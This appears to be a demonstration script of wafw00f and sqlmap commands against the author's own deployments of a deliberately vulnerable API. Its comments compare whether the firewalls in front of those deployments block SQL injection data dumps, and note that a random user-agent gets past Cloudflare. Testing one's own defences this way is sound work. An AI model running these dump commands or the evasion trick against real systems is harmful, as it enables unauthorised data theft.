
## Prove there is no WAF
wafw00f kvaesvampisecure.azurewebsites.net
## Scan the secure version, no dump
sqlmap -u "https://kvaesvampisecure.azurewebsites.net/users/v1/*admin*" --method=GET --dump

## Prove there is no WAF
wafw00f kvaesvampiinsecure.azurewebsites.net
## Scan the insecure version, results in a dump
sqlmap -u "https://kvaesvampiinsecure.azurewebsites.net/users/v1/*admin*" --method=GET --dump

## Show that AZ FD WAF is detected
wafw00f kvaestestvampi-g3dsbehwaghrgadx.b01.azurefd.net
## Scan the insecure version, results in a dump
sqlmap -u "https://kvaestestvampi-g3dsbehwaghrgadx.b01.azurefd.net/insecure/users/v1/*admin*" --method=GET --dump

## Show CloudFlare is detected
wafw00f vampiinsecure.kvaes.be
## Scan the insecure version, no dump, cloudflare blocks
sqlmap -u "https://vampiinsecure.kvaes.be/users/v1/*admin*" --method=GET --dump
## Try again with random agents, results in a dump
sqlmap -u "https://vampiinsecure.kvaes.be/users/v1/*admin*" --method=GET --dump --random-agent